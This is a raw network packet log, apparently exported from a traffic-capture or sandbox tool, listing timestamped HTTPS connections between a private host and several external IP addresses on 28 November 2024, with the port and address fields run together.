                                                                                                                                          Nov 28, 2024 11:33:01.535506964 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.535583973 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.536456108 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.536478996 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.540312052 CET49837443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.540347099 CET443498375.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.540409088 CET49837443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.540666103 CET49837443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.540679932 CET443498375.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.547105074 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.547163963 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.547168016 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.547213078 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.547410965 CET49825443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.547425032 CET443498255.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.550276995 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.550302982 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.550357103 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.550532103 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.550540924 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.551035881 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.551048994 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.551104069 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.551374912 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.551383972 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.553343058 CET49840443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.553371906 CET443498405.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.553421974 CET49840443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.553823948 CET49840443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.553838015 CET443498405.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.581563950 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.581595898 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.581603050 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.581633091 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.581656933 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.581690073 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.581743002 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.615658045 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.617705107 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.617759943 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.618505001 CET49828443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.618519068 CET443498285.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.621381998 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.666136026 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.666147947 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.666184902 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.666225910 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.666275024 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.677580118 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.677603006 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.677664995 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.677674055 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.685842037 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.685883999 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.687246084 CET49827443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.687256098 CET443498275.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.704441071 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.704457998 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.704511881 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.704833984 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.704845905 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.726962090 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.727000952 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.727058887 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.727235079 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.727247953 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.771609068 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.771620989 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.771672964 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.771857977 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.800314903 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.800328970 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.800400019 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.826168060 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.826176882 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.826229095 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.826272011 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.867260933 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.867341995 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.887664080 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.887732029 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.976948977 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.977015972 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:01.992712021 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.992774963 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.008228064 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.008291960 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.020869970 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.020931959 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.031987906 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.032051086 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.040600061 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.040652990 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.088968992 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.089046001 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.097024918 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.097093105 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.173544884 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.173635960 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.181111097 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.181189060 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.188704014 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.188786030 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.196152925 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.196223021 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.206126928 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.206198931 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.213579893 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.213658094 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.219947100 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.220009089 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.225419044 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.225481987 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.232563972 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.232625961 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.238773108 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.238841057 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.244201899 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.244271040 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.250124931 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.250188112 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.273056030 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.273128033 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.277645111 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.277704954 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.284713984 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.284773111 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.371716976 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.371808052 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.371814013 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.371871948 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.372168064 CET49826443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.372179985 CET443498265.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.417313099 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.419589996 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.419610977 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.420187950 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.420192957 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.489310026 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.489830017 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.489850998 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.490320921 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.490325928 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.820482016 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.821157932 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.821173906 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.821561098 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.821568966 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.862134933 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.862200975 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.862416029 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.862459898 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.862469912 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.862478018 CET49831443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.862485886 CET4434983113.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.865416050 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.865454912 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.865545988 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.865734100 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.865746021 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.881306887 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.881830931 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.881854057 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.882839918 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.882844925 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.942337990 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.942653894 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.942688942 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.943006992 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.943078995 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.943116903 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.943181992 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.943276882 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.943293095 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.943305969 CET49830443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.943316936 CET4434983013.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.943506956 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.943574905 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.943665981 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.946304083 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.946330070 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.946455002 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.946630001 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:02.946645975 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.955212116 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.955472946 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.955482960 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.955826998 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.956160069 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.956213951 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.956281900 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.989700079 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:02.989708900 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.999331951 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.179349899 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.179667950 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.179682970 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.180068970 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.180144072 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.180783987 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.180862904 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.181060076 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.181118011 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.181225061 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.181261063 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.181267977 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.181355000 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.202759027 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.212718010 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.212728977 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.213054895 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.213124037 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.213653088 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.213706017 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.213932991 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.213985920 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.214104891 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.214114904 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.246341944 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.259903908 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.264884949 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.264947891 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.265048981 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.265198946 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.265219927 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.265228033 CET49834443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.265233994 CET4434983413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.268193960 CET49845443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.268227100 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.268333912 CET49845443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.268542051 CET49845443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.268553019 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.290061951 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:03.290072918 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.291135073 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:03.291172028 CET443498185.57.42.148192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.291227102 CET49818443192.168.2.45.57.42.148
                                                                                                                                          Nov 28, 2024 11:33:03.335164070 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.335203886 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.335269928 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.335455894 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.335468054 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.335479021 CET49833443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.335484982 CET4434983313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.338260889 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.338303089 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.338412046 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.338570118 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:03.338587999 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.501302004 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.501322031 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.501329899 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.501378059 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.501415014 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.501441956 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.508866072 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.508893967 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.508953094 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.508969069 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.517230034 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.517292976 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.517314911 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.517339945 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.517525911 CET49838443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.517541885 CET443498385.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.520023108 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.520049095 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.520102024 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.520534039 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.520549059 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.520988941 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.521027088 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.521083117 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.521507025 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.521519899 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.542078018 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.583002090 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.583012104 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.583064079 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.583129883 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.648955107 CET443498375.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.649244070 CET49837443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.649257898 CET443498375.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.649655104 CET443498375.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.650185108 CET49837443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.650245905 CET443498375.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.650372982 CET49837443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.680530071 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.680541039 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.680607080 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.691342115 CET443498375.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.713789940 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.713799953 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.713865042 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.738913059 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.738922119 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.738975048 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.743185043 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.743202925 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.743272066 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.743316889 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.743316889 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.744226933 CET49842443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.744242907 CET443498425.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.774918079 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.775021076 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.784714937 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.784743071 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.784749985 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.784773111 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.784856081 CET443498415.57.41.119192.168.2.4
